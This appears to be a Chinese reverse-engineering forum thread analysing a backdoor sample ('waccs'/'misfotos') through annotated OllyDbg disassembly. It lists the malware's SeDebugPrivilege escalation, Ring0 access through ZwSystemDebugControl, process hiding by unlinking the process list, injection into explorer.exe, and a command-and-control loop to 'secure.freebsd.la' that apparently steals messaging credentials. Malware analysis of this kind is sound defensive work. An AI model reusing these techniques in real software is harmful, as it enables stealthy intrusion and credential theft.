004040BF C785 BCFDFFFF 3>MOV DWORD PTR SS:[EBP-244],3C
004040C9 83A5 C4FDFFFF 0>AND DWORD PTR SS:[EBP-23C],0
004040D0 C785 C8FDFFFF 5>MOV DWORD PTR SS:[EBP-238],misfotos.0040>; open
004040DA 8D85 B8FCFFFF LEA EAX,DWORD PTR SS:[EBP-348]
004040E0 8985 CCFDFFFF MOV DWORD PTR SS:[EBP-234],EAX
004040E6 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
004040EC 8985 D0FDFFFF MOV DWORD PTR SS:[EBP-230],EAX
004040F2 83A5 D4FDFFFF 0>AND DWORD PTR SS:[EBP-22C],0
004040F9 83A5 D8FDFFFF 0>AND DWORD PTR SS:[EBP-228],0
00404100 C785 C0FDFFFF 4>MOV DWORD PTR SS:[EBP-240],40
0040410A 68 00010000    PUSH 100
0040410F FF15 C8804000 CALL DWORD PTR DS:[4080C8]             ; kernel32.GetCurrentProcess
00404115 50             PUSH EAX                               ; hProcess = FFFFFFFF
00404116 FF15 C4804000 CALL DWORD PTR DS:[4080C4]             ; kernel32.SetPriorityClass
0040411C 6A 0F          PUSH 0F
0040411E FF15 C0804000 CALL DWORD PTR DS:[4080C0]             ; kernel32.GetCurrentThread
00404124 50             PUSH EAX
00404125 FF15 BC804000 CALL DWORD PTR DS:[4080BC]             ; kernel32.SetThreadPriority
0040412B 8D85 BCFDFFFF LEA EAX,DWORD PTR SS:[EBP-244]
00404131 50             PUSH EAX
00404132 FF15 78814000 CALL DWORD PTR DS:[408178]             ; SHELL32.ShellExecuteExA(调用运行控制台程序执行命令).
00404138 6A 40          PUSH 40                               ; Priority = IDLE_PRIORITY_CLASS
0040413A FFB5 F4FDFFFF PUSH DWORD PTR SS:[EBP-20C]
00404140 FF15 C4804000 CALL DWORD PTR DS:[4080C4]             ; kernel32.SetPriorityClass
00404146 6A 01          PUSH 1
00404148 FFB5 F4FDFFFF PUSH DWORD PTR SS:[EBP-20C]
0040414E FF15 B8804000 CALL DWORD PTR DS:[4080B8]             ; kernel32.SetProcessPriorityBoost
00404154 6A 00          PUSH 0
00404156 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040415C 50             PUSH EAX
0040415D 6A 01          PUSH 1
0040415F 6A 04          PUSH 4
00404161 FF15 70814000 CALL DWORD PTR DS:[408170]             ; SHELL32.SHChangeNotify
00404167 6A 00          PUSH 0                                  ; /status = 0
00404169 E8 22300000    CALL misfotos.00407190                ; JMP 到 msvcrt.exit(关闭退出).
0040416E C9             LEAVE
0040416F C3             RETN                                  ; 返回.
----------------------------------------------------------

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・2

免费・0

支持

最新回复 (14)
coderui 雪币： 288 活跃值： (53) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 188 粉丝 7 关注私信	coderui 2 2 楼 ---------------------------------------------------------------------------------------------------- 2、当样本执行恶意操作时的分析： 00402D14 FF15 88804000 CALL DWORD PTR DS:[408088] ; ntdll.RtlGetLastWin32Error(如果s2 == s1,则该病毒程序从这里开始执行恶意操作.) 00402D1A 3D B7000000 CMP EAX,0B7 ; EAX = 0x51D 00402D1F 75 08 JNZ SHORT waccs.00402D29 ; 条件判断. 00402D21 6A 00 PUSH 0 00402D23 FF15 84804000 CALL DWORD PTR DS:[408084] ; kernel32.ExitProcess(不满足条件则关闭退出). 00402D29 8D85 54FCFFFF LEA EAX,DWORD PTR SS:[EBP-3AC] 00402D2F 50 PUSH EAX ; /pWSAData = 0012FC14 00402D30 68 02020000 PUSH 202 ; \|RequestedVersion = 202 (2.2.) 00402D35 FF15 DC814000 CALL DWORD PTR DS:[4081DC] ; WS2_32.WSAStartup(定义协议WinSock 2.0). 00402D3B 85C0 TEST EAX,EAX ; 判断是否定义成功. 00402D3D 74 1E JE SHORT waccs.00402D5D ; 如果失败则执行下边代码，定义协议WinSock 1.0. 00402D3F 8D85 54FCFFFF LEA EAX,DWORD PTR SS:[EBP-3AC] 00402D45 50 PUSH EAX 00402D46 68 01010000 PUSH 101 00402D4B FF15 DC814000 CALL DWORD PTR DS:[4081DC] ; WS2_32.WSAStartup(定义协议WinSock 1.0). 00402D51 85C0 TEST EAX,EAX ; 判断是否定义成功. 00402D53 74 08 JE SHORT waccs.00402D5D ; 如果失败则执行下边代码,关闭退出. 00402D55 6A 01 PUSH 1 00402D57 FF15 84804000 CALL DWORD PTR DS:[408084] ; kernel32.ExitProcess(关闭退出). 00402D5D 8D85 4CFCFFFF LEA EAX,DWORD PTR SS:[EBP-3B4] 00402D63 50 PUSH EAX 00402D64 8D85 B0F9FFFF LEA EAX,DWORD PTR SS:[EBP-650] 00402D6A 50 PUSH EAX 00402D6B 8D85 48FCFFFF LEA EAX,DWORD PTR SS:[EBP-3B8] 00402D71 50 PUSH EAX 00402D72 E8 2D120000 CALL waccs.00403FA4 ; 获得操作系统版本号. 00402D77 83C4 0C ADD ESP,0C 00402D7A 83BD 48FCFFFF 0>CMP DWORD PTR SS:[EBP-3B8],5 ; 规范范围 00402D81 75 31 JNZ SHORT waccs.00402DB4 ; 如果系统版本不符合,则不执行"进程隐藏"操作. 00402D83 83BD B0F9FFFF 0>CMP DWORD PTR SS:[EBP-650],1 ; 规范范围 00402D8A 75 28 JNZ SHORT waccs.00402DB4 ; 如果系统版本不符合,则不执行"进程隐藏"操作. 00402D8C 8D8D 98F8FFFF LEA ECX,DWORD PTR SS:[EBP-768] 00402D92 E8 15380000 CALL waccs.004065AC ; 提升自身进程权限为"SeDebugPrivilege"权限，列举进程的内核模块，得到"ntkrnlpa.exe"模块，导出"PsInitialSystemProcess"函数，调用ZwSystemDebugControl进入Ring0. 00402D97 FF15 80804000 CALL DWORD PTR DS:[408080] ; kernel32.GetCurrentProcessId(得到当前进程的ID). 00402D9D 50 PUSH EAX 00402D9E 8D8D 98F8FFFF LEA ECX,DWORD PTR SS:[EBP-768] 00402DA4 E8 AC360000 CALL waccs.00406455 ; RRING3下实现进程隐藏(删除活动进程链表实现进程隐藏). 00402DA9 8D8D 98F8FFFF LEA ECX,DWORD PTR SS:[EBP-768] 00402DAF E8 E6380000 CALL waccs.0040669A ; 释放内存资源. 00402DB4 68 B581D32E PUSH 2ED381B5 00402DB9 8D8D 70F8FFFF LEA ECX,DWORD PTR SS:[EBP-790] 00402DBF E8 0C030000 CALL waccs.004030D0 ; ASCII "t3x0" 00402DC4 50 PUSH EAX ; ASCII "t3x0" 00402DC5 6A 00 PUSH 0 00402DC7 6A 00 PUSH 0 00402DC9 FF15 7C804000 CALL DWORD PTR DS:[40807C] ; kernel32.CreateMutexA(创建一个互斥体"t3x0"). 00402DCF A3 D4A04000 MOV DWORD PTR DS:[40A0D4],EAX 00402DD4 8D8D 70F8FFFF LEA ECX,DWORD PTR SS:[EBP-790] 00402DDA E8 47F2FFFF CALL waccs.00402026 ; 清除内存数据. 00402DDF 68 BD81D32E PUSH 2ED381BD 00402DE4 8D8D 68F8FFFF LEA ECX,DWORD PTR SS:[EBP-798] 00402DEA E8 E1020000 CALL waccs.004030D0 ; ASCII "t3x0" 00402DEF 50 PUSH EAX 00402DF0 E8 1B270000 CALL waccs.00405510 ;向系统桌面程序“explorer.exe”进程内存空间中注入恶意代码，执行进程守护功能. 00402DF5 59 POP ECX 00402DF6 A3 D8A04000 MOV DWORD PTR DS:[40A0D8],EAX 00402DFB 8D8D 68F8FFFF LEA ECX,DWORD PTR SS:[EBP-798] 00402E01 E8 20F2FFFF CALL waccs.00402026 ; 清除内存数据. 00402E06 68 18010000 PUSH 118 00402E0B 6A 00 PUSH 0 00402E0D 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402E13 50 PUSH EAX 00402E14 E8 21420000 CALL waccs.0040703A ; JMP 到 msvcrt.memset 00402E19 83C4 0C ADD ESP,0C 00402E1C 68 10270000 PUSH 2710 00402E21 68 9B15572C PUSH 2C57159B 00402E26 8D8D 5CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7A4] 00402E2C E8 FF020000 CALL waccs.00403130 ; ASCII "$msr" 00402E31 50 PUSH EAX ; /MutexName = "$msr" 00402E32 6A 00 PUSH 0 ; \|InitialOwner = FALSE 00402E34 6A 00 PUSH 0 ; \|pSecurity = NULL 00402E36 FF15 7C804000 CALL DWORD PTR DS:[40807C] ; kernel32.CreateMutexA 00402E3C 8985 F0FEFFFF MOV DWORD PTR SS:[EBP-110],EAX 00402E42 FFB5 F0FEFFFF PUSH DWORD PTR SS:[EBP-110] 00402E48 FF15 78804000 CALL DWORD PTR DS:[408078] ; kernel32.WaitForSingleObject 00402E4E 2D 02010000 SUB EAX,102 00402E53 F7D8 NEG EAX 00402E55 1BC0 SBB EAX,EAX 00402E57 40 INC EAX 00402E58 8885 64F8FFFF MOV BYTE PTR SS:[EBP-79C],AL 00402E5E 8D8D 5CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7A4] 00402E64 E8 BDF1FFFF CALL waccs.00402026 ; 清除内存数据. 00402E69 0FB685 64F8FFFF MOVZX EAX,BYTE PTR SS:[EBP-79C] 00402E70 85C0 TEST EAX,EAX 00402E72 74 05 JE SHORT waccs.00402E79 00402E74 E8 2F420000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00402E79 8D85 B8FAFFFF LEA EAX,DWORD PTR SS:[EBP-548] 00402E7F 50 PUSH EAX ; /pWSAData = 0012FA78 00402E80 68 02020000 PUSH 202 ; \|RequestedVersion = 202 (2.2.) 00402E85 FF15 DC814000 CALL DWORD PTR DS:[4081DC] ; WS2_32.WSAStartup(定义协议WinSock 2.0). 00402E8B 83A5 50FCFFFF 0>AND DWORD PTR SS:[EBP-3B0],0 00402E92 6A 19 PUSH 19 ; /maxlen = 19 (25.) 00402E94 68 6A2A944C PUSH 4C942A6A 00402E99 8D8D 50F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B0] 00402E9F E8 EC020000 CALL waccs.00403190 ; ASCII "##ghetto##" 00402EA4 50 PUSH EAX ; \|src = "##ghetto##" 00402EA5 8D85 85FEFFFF LEA EAX,DWORD PTR SS:[EBP-17B] 00402EAB 50 PUSH EAX ; \|dest = 0012FE45 00402EAC E8 EB410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402EB1 83C4 0C ADD ESP,0C 00402EB4 8D8D 50F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B0] 00402EBA E8 B7F1FFFF CALL waccs.00402076 ; 清除内存数据. 00402EBF 6A 19 PUSH 19 ; /maxlen = 19 (25.) 00402EC1 68 75F453B3 PUSH B353F475 00402EC6 8D8D 48F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B8] 00402ECC E8 1F030000 CALL waccs.004031F0 ; ASCII "3atsh1t" 00402ED1 50 PUSH EAX ; \|src = "3atsh1t" 00402ED2 8D85 9EFEFFFF LEA EAX,DWORD PTR SS:[EBP-162] 00402ED8 50 PUSH EAX ; \|dest = 0012FE5E 00402ED9 E8 BE410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402EDE 83C4 0C ADD ESP,0C 00402EE1 8D8D 48F8FFFF LEA ECX,DWORD PTR SS:[EBP-7B8] 00402EE7 E8 EAF0FFFF CALL waccs.00401FD6 ; 清除内存数据. 00402EEC 6A 19 PUSH 19 ; /maxlen = 19 (25.) 00402EEE 68 36A1576B PUSH 6B57A136 00402EF3 8D8D 38F8FFFF LEA ECX,DWORD PTR SS:[EBP-7C8] 00402EF9 E8 52030000 CALL waccs.00403250 ; ASCII "##ghetto-s##" 00402EFE 50 PUSH EAX ; \|src = "##ghetto-s##" 00402EFF 8D85 B7FEFFFF LEA EAX,DWORD PTR SS:[EBP-149] 00402F05 50 PUSH EAX ; \|dest = 0012FE77 00402F06 E8 91410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402F0B 83C4 0C ADD ESP,0C 00402F0E 8D8D 38F8FFFF LEA ECX,DWORD PTR SS:[EBP-7C8] 00402F14 E8 CF000000 CALL waccs.00402FE8 ; 清除内存数据. 00402F19 6A 01 PUSH 1 00402F1B 58 POP EAX 00402F1C 85C0 TEST EAX,EAX 00402F1E 0F84 BD000000 JE waccs.00402FE1 00402F24 68 80000000 PUSH 80 ; /maxlen = 80 (128.) 00402F29 68 C8F8D8A9 PUSH A9D8F8C8 00402F2E 8D8D 24F8FFFF LEA ECX,DWORD PTR SS:[EBP-7DC] 00402F34 E8 77030000 CALL waccs.004032B0 ; ASCII "secure.freebsd.la"(骇客定义的远程服务器域名地址，加密存放). 00402F39 50 PUSH EAX ; \|src = "secure.freebsd.la" 00402F3A 8D85 E8FDFFFF LEA EAX,DWORD PTR SS:[EBP-218] 00402F40 50 PUSH EAX ; \|dest = 0012FDA8 00402F41 E8 56410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402F46 83C4 0C ADD ESP,0C 00402F49 8D8D 24F8FFFF LEA ECX,DWORD PTR SS:[EBP-7DC] 00402F4F E8 92EFFFFF CALL waccs.00401EE6 ; 清除内存数据. 00402F54 6A 19 PUSH 19 ; maxlen = 19 (25.) 00402F56 68 24DC4A5C PUSH 5C4ADC24 00402F5B 8D8D 1CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7E4] 00402F61 E8 AA030000 CALL waccs.00403310 ; ASCII "su1c1d3" 00402F66 50 PUSH EAX ; \|src = "su1c1d3" 00402F67 8D85 6CFEFFFF LEA EAX,DWORD PTR SS:[EBP-194] 00402F6D 50 PUSH EAX ; \|dest = 0012FE2C 00402F6E E8 29410000 CALL waccs.0040709C ; JMP 到 msvcrt.strncpy 00402F73 83C4 0C ADD ESP,0C 00402F76 8D8D 1CF8FFFF LEA ECX,DWORD PTR SS:[EBP-7E4] 00402F7C E8 55F0FFFF CALL waccs.00401FD6 ; 清除内存数据. 00402F81 C785 68FEFFFF 4>MOV DWORD PTR SS:[EBP-198],2646 00402F8B 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402F91 50 PUSH EAX 00402F92 E8 13E1FFFF CALL waccs.004010AA ; 连接骇客远程服务器"http://www.secure.freebsd.la". 00402F97 59 POP ECX 00402F98 0FB6C0 MOVZX EAX,AL 00402F9B 85C0 TEST EAX,EAX 00402F9D 74 32 JE SHORT waccs.00402FD1 ; 判断是否连接成功， 00402F9F 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402FA5 50 PUSH EAX 00402FA6 E8 98E1FFFF CALL waccs.00401143 ; 查找系统中是否运行某些通讯工具(可能会利用这些通讯工具发布广告、进行自我传播以及窃取其帐号密码信息等操作)，并构造发送数据包(多种包格式/与骇客远程服务器进行秘密通信). 00402FAB 59 POP ECX 00402FAC 0FB6C0 MOVZX EAX,AL 00402FAF 85C0 TEST EAX,EAX 00402FB1 74 1E JE SHORT waccs.00402FD1 00402FB3 8D85 E4FDFFFF LEA EAX,DWORD PTR SS:[EBP-21C] 00402FB9 50 PUSH EAX 00402FBA E8 4AE5FFFF CALL waccs.00401509 ; 接收从骇客服务器返回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作. 00402FBF 59 POP ECX 00402FC0 0FB6C0 MOVZX EAX,AL 00402FC3 85C0 TEST EAX,EAX 00402FC5 74 0A JE SHORT waccs.00402FD1 00402FC7 6A 0A PUSH 0A ; /Timeout = 10. ms 00402FC9 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待10毫秒). 00402FCF ^ EB E2 JMP SHORT waccs.00402FB3 ; 循环执行上边的代码(00402FB3-00402FCF)，接收从骇客服务器返回的数据包，根据包中骇客定义好的“指令”执行相应的恶意操作. 00402FD1 68 30750000 PUSH 7530 ; /Timeout = 30000. ms 00402FD6 FF15 6C804000 CALL DWORD PTR DS:[40806C] ; kernel32.Sleep(等待30000毫秒). 00402FDC ^ E9 38FFFFFF JMP waccs.00402F19 ; 循环执行上边的代码(00402F19-00402FDC)，进行与骇客指定的远程服务器进行秘密通信(向骇客服务器发送数据包). 00402FE1 E8 C2400000 CALL waccs.004070A8 ; JMP 到 msvcrt._endthread 00402FE6 C9 LEAVE 00402FE7 C3 RETN ; 返回. ---------------------------------------------------------- 获得操作系统版本号： 00403FA4 55 PUSH EBP 00403FA5 8BEC MOV EBP,ESP 00403FA7 81EC 9C000000 SUB ESP,9C 00403FAD C785 64FFFFFF 9>MOV DWORD PTR SS:[EBP-9C],9C 00403FB7 8D85 64FFFFFF LEA EAX,DWORD PTR SS:[EBP-9C] 00403FBD 50 PUSH EAX 00403FBE FF15 B0804000 CALL DWORD PTR DS:[4080B0] ; kernel32.GetVersionExA(获取当前操作系统版本号信息). 00403FC4 85C0 TEST EAX,EAX 00403FC6 75 04 JNZ SHORT waccs.00403FCC ; 判断是否成功. 00403FC8 32C0 XOR AL,AL 00403FCA EB 21 JMP SHORT waccs.00403FED 00403FCC 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 00403FCF 8B8D 68FFFFFF MOV ECX,DWORD PTR SS:[EBP-98] 00403FD5 8908 MOV DWORD PTR DS:[EAX],ECX 00403FD7 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] 00403FDA 8B8D 6CFFFFFF MOV ECX,DWORD PTR SS:[EBP-94] 00403FE0 8908 MOV DWORD PTR DS:[EAX],ECX 00403FE2 0FB745 F8 MOVZX EAX,WORD PTR SS:[EBP-8] 00403FE6 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10] 00403FE9 8901 MOV DWORD PTR DS:[ECX],EAX 00403FEB B0 01 MOV AL,1 00403FED C9 LEAVE 00403FEE C3 RETN ; 返回. 提升自身进程权限为"SeDebugPrivilege"权限，列举进程的内核模块，得到"ntkrnlpa.exe"模块，导出"PsInitialSystemProcess"函数，调用ZwSystemDebugControl进入Ring0： 004065AC 55 PUSH EBP 004065AD 8BEC MOV EBP,ESP 004065AF 81EC 30010000 SUB ESP,130 004065B5 898D D4FEFFFF MOV DWORD PTR SS:[EBP-12C],ECX 004065BB 6A 01 PUSH 1 004065BD E8 E00B0000 CALL waccs.004071A2 ; JMP 到 msvcrt.??2@YAPAXI@Z 004065C2 83C4 04 ADD ESP,4 004065C5 8985 F0FEFFFF MOV DWORD PTR SS:[EBP-110],EAX 004065CB 83BD F0FEFFFF 0>CMP DWORD PTR SS:[EBP-110],0 004065D2 74 13 JE SHORT waccs.004065E7 004065D4 8B8D F0FEFFFF MOV ECX,DWORD PTR SS:[EBP-110] 004065DA E8 A1F7FFFF CALL waccs.00405D80 ; 提升自身进程权限为"SeDebugPrivilege"权限. 004065DF 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX 004065E5 EB 0A JMP SHORT waccs.004065F1 004065E7 C785 D0FEFFFF 0>MOV DWORD PTR SS:[EBP-130],0 004065F1 8B85 D4FEFFFF MOV EAX,DWORD PTR SS:[EBP-12C] 004065F7 8B8D D0FEFFFF MOV ECX,DWORD PTR SS:[EBP-130] 004065FD 8908 MOV DWORD PTR DS:[EAX],ECX 004065FF 8D95 00FFFFFF LEA EDX,DWORD PTR SS:[EBP-100] 00406605 52 PUSH EDX 00406606 8D85 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP-10C] 0040660C 50 PUSH EAX 0040660D 8B8D D4FEFFFF MOV ECX,DWORD PTR SS:[EBP-12C] 00406613 E8 77FDFFFF CALL waccs.0040638F ; 列举进程的内核模块，得到"ntkrnlpa.exe"模块. 00406618 8D8D 00FFFFFF LEA ECX,DWORD PTR SS:[EBP-100] 0040661E 51 PUSH ECX ; /FileName = "ntkrnlpa.exe" 0040661F FF15 40804000 CALL DWORD PTR DS:[408040] ; kernel32.LoadLibraryA(加载"ntkrnlpa.exe"). 00406625 8985 F8FEFFFF MOV DWORD PTR SS:[EBP-108],EAX 0040662B 68 99C8E33A PUSH 3AE3C899 00406630 8D8D D8FEFFFF LEA ECX,DWORD PTR SS:[EBP-128] 00406636 E8 15020000 CALL waccs.00406850 ; ASCII "PsInitialSystemProcess" 0040663B 50 PUSH EAX ; /ProcNameOrOrdinal = "PsInitialSystemProcess" 0040663C 8B95 F8FEFFFF MOV EDX,DWORD PTR SS:[EBP-108] 00406642 52 PUSH EDX ; \|hModule = 009B0000 (ntkrnlpa) 00406643 FF15 44804000 CALL DWORD PTR DS:[408044] ; kernel32.GetProcAddress(导出"PsInitialSystemProcess"函数). 00406649 8985 FCFEFFFF MOV DWORD PTR SS:[EBP-104],EAX 0040664F 8D8D D8FEFFFF LEA ECX,DWORD PTR SS:[EBP-128] 00406655 E8 C6000000 CALL waccs.00406720 ; 清除内存数据. 0040665A 8B85 FCFEFFFF MOV EAX,DWORD PTR SS:[EBP-104] 00406660 2B85 F8FEFFFF SUB EAX,DWORD PTR SS:[EBP-108] 00406666 0385 F4FEFFFF ADD EAX,DWORD PTR SS:[EBP-10C] 0040666C 50 PUSH EAX 0040666D 8B8D D4FEFFFF MOV ECX,DWORD PTR SS:[EBP-12C] 00406673 8B09 MOV ECX,DWORD PTR DS:[ECX] 00406675 E8 5EF7FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 0040667A 8B95 D4FEFFFF MOV EDX,DWORD PTR SS:[EBP-12C] 00406680 8942 04 MOV DWORD PTR DS:[EDX+4],EAX 00406683 8B85 F8FEFFFF MOV EAX,DWORD PTR SS:[EBP-108] 00406689 50 PUSH EAX 0040668A FF15 3C804000 CALL DWORD PTR DS:[40803C] ; kernel32.FreeLibrary(卸载对"ntkrnlpa.exe"的调用). 00406690 8B85 D4FEFFFF MOV EAX,DWORD PTR SS:[EBP-12C] 00406696 8BE5 MOV ESP,EBP 00406698 5D POP EBP 00406699 C3 RETN ; 返回. 提升自身进程权限为"SeDebugPrivilege"权限： 00405D80 55 PUSH EBP 00405D81 8BEC MOV EBP,ESP 00405D83 83EC 18 SUB ESP,18 00405D86 894D E8 MOV DWORD PTR SS:[EBP-18],ECX 00405D89 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14] 00405D8C 50 PUSH EAX 00405D8D 6A 28 PUSH 28 00405D8F FF15 C8804000 CALL DWORD PTR DS:[4080C8] ; kernel32.GetCurrentProcess 00405D95 50 PUSH EAX 00405D96 FF15 14804000 CALL DWORD PTR DS:[408014] ; ADVAPI32.OpenProcessToken 00405D9C C745 F0 0100000>MOV DWORD PTR SS:[EBP-10],1 00405DA3 C745 FC 0200000>MOV DWORD PTR SS:[EBP-4],2 00405DAA 8D4D F4 LEA ECX,DWORD PTR SS:[EBP-C] 00405DAD 51 PUSH ECX 00405DAE 68 20A04000 PUSH waccs.0040A020 ; ASCII "SeDebugPrivilege" 00405DB3 6A 00 PUSH 0 00405DB5 FF15 10804000 CALL DWORD PTR DS:[408010] ; ADVAPI32.LookupPrivilegeValueA 00405DBB 6A 00 PUSH 0 00405DBD 6A 00 PUSH 0 00405DBF 6A 10 PUSH 10 00405DC1 8D55 F0 LEA EDX,DWORD PTR SS:[EBP-10] 00405DC4 52 PUSH EDX 00405DC5 6A 00 PUSH 0 00405DC7 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14] 00405DCA 50 PUSH EAX 00405DCB FF15 0C804000 CALL DWORD PTR DS:[40800C] ; ADVAPI32.AdjustTokenPrivileges 00405DD1 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] 00405DD4 8BE5 MOV ESP,EBP 00405DD6 5D POP EBP 00405DD7 C3 RETN ; 返回. 列举进程的内核模块，得到"ntkrnlpa.exe"模块： 0040638F 55 PUSH EBP 00406390 8BEC MOV EBP,ESP 00406392 81EC 38010000 SUB ESP,138 00406398 56 PUSH ESI 00406399 57 PUSH EDI 0040639A 898D C8FEFFFF MOV DWORD PTR SS:[EBP-138],ECX 004063A0 C745 FC 2001000>MOV DWORD PTR SS:[EBP-4],120 004063A7 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 004063AA 50 PUSH EAX 004063AB 6A 00 PUSH 0 004063AD 6A 00 PUSH 0 004063AF 6A 0B PUSH 0B 004063B1 FF15 F4814000 CALL DWORD PTR DS:[4081F4] ; ntdll.ZwQuerySystemInformation 004063B7 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 004063BA 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4] 004063BD 51 PUSH ECX 004063BE E8 DF0D0000 CALL waccs.004071A2 ; JMP 到 msvcrt.??2@YAPAXI@Z 004063C3 83C4 04 ADD ESP,4 004063C6 8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX 004063CC 8B95 D0FEFFFF MOV EDX,DWORD PTR SS:[EBP-130] 004063D2 8955 F4 MOV DWORD PTR SS:[EBP-C],EDX 004063D5 6A 00 PUSH 0 004063D7 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 004063DA 50 PUSH EAX 004063DB 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004063DE 51 PUSH ECX 004063DF 6A 0B PUSH 0B 004063E1 FF15 F4814000 CALL DWORD PTR DS:[4081F4] ; ntdll.ZwQuerySystemInformation 004063E7 8B75 F4 MOV ESI,DWORD PTR SS:[EBP-C] 004063EA B9 48000000 MOV ECX,48 004063EF 8DBD D4FEFFFF LEA EDI,DWORD PTR SS:[EBP-12C] 004063F5 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS> 004063F7 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 004063FA 8995 CCFEFFFF MOV DWORD PTR SS:[EBP-134],EDX 00406400 8B85 CCFEFFFF MOV EAX,DWORD PTR SS:[EBP-134] 00406406 50 PUSH EAX 00406407 E8 9C0D0000 CALL waccs.004071A8 ; JMP 到 msvcrt.??3@YAXPAX@Z 0040640C 83C4 04 ADD ESP,4 0040640F 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] 00406412 8B95 E0FEFFFF MOV EDX,DWORD PTR SS:[EBP-120] 00406418 8911 MOV DWORD PTR DS:[ECX],EDX 0040641A 8B85 F2FEFFFF MOV EAX,DWORD PTR SS:[EBP-10E] 00406420 25 FFFF0000 AND EAX,0FFFF 00406425 B9 00010000 MOV ECX,100 0040642A 2BC8 SUB ECX,EAX 0040642C 51 PUSH ECX 0040642D 8B95 F2FEFFFF MOV EDX,DWORD PTR SS:[EBP-10E] 00406433 81E2 FFFF0000 AND EDX,0FFFF 00406439 8D8415 F4FEFFFF LEA EAX,DWORD PTR SS:[EBP+EDX-10C] 00406440 50 PUSH EAX 00406441 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 00406444 51 PUSH ECX 00406445 E8 520D0000 CALL waccs.0040719C ; JMP 到 msvcrt.memcpy 0040644A 83C4 0C ADD ESP,0C 0040644D 5F POP EDI 0040644E 5E POP ESI 0040644F 8BE5 MOV ESP,EBP 00406451 5D POP EBP 00406452 C2 0800 RETN 8 ; 返回. RING3下实现进程隐藏(删除活动进程链表实现进程隐藏)： 00406455 55 PUSH EBP 00406456 8BEC MOV EBP,ESP 00406458 83EC 1C SUB ESP,1C 0040645B 894D E4 MOV DWORD PTR SS:[EBP-1C],ECX 0040645E 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406461 8B48 04 MOV ECX,DWORD PTR DS:[EAX+4] 00406464 894D F4 MOV DWORD PTR SS:[EBP-C],ECX 00406467 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040646A C742 08 8800000>MOV DWORD PTR DS:[EDX+8],88 00406471 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406474 C740 0C 8400000>MOV DWORD PTR DS:[EAX+C],84 0040647B 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 0040647E 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 00406481 0351 08 ADD EDX,DWORD PTR DS:[ECX+8] 00406484 52 PUSH EDX 00406485 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C] 00406488 8B08 MOV ECX,DWORD PTR DS:[EAX] 0040648A E8 49F9FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 0040648F 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 00406492 2B41 08 SUB EAX,DWORD PTR DS:[ECX+8] 00406495 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 00406498 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 0040649B 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8] 0040649E 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 004064A1 50 PUSH EAX 004064A2 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 004064A5 8B09 MOV ECX,DWORD PTR DS:[ECX] 004064A7 E8 2CF9FFFF CALL waccs.00405DD8 ; 调用ZwSystemDebugControl进入Ring0. 004064AC 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064AF 2B42 08 SUB EAX,DWORD PTR DS:[EDX+8] 004064B2 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 004064B5 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004064B8 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX 004064BB 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004064BE 894D E8 MOV DWORD PTR SS:[EBP-18],ECX 004064C1 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C] 004064C4 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C] 004064C7 0342 08 ADD EAX,DWORD PTR DS:[EDX+8] 004064CA 50 PUSH EAX 004064CB 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 004064CE 8B09 MOV ECX,DWORD PTR DS:[ECX] 004064D0 E8 03F9FFFF CALL waccs.00405DD8 ; 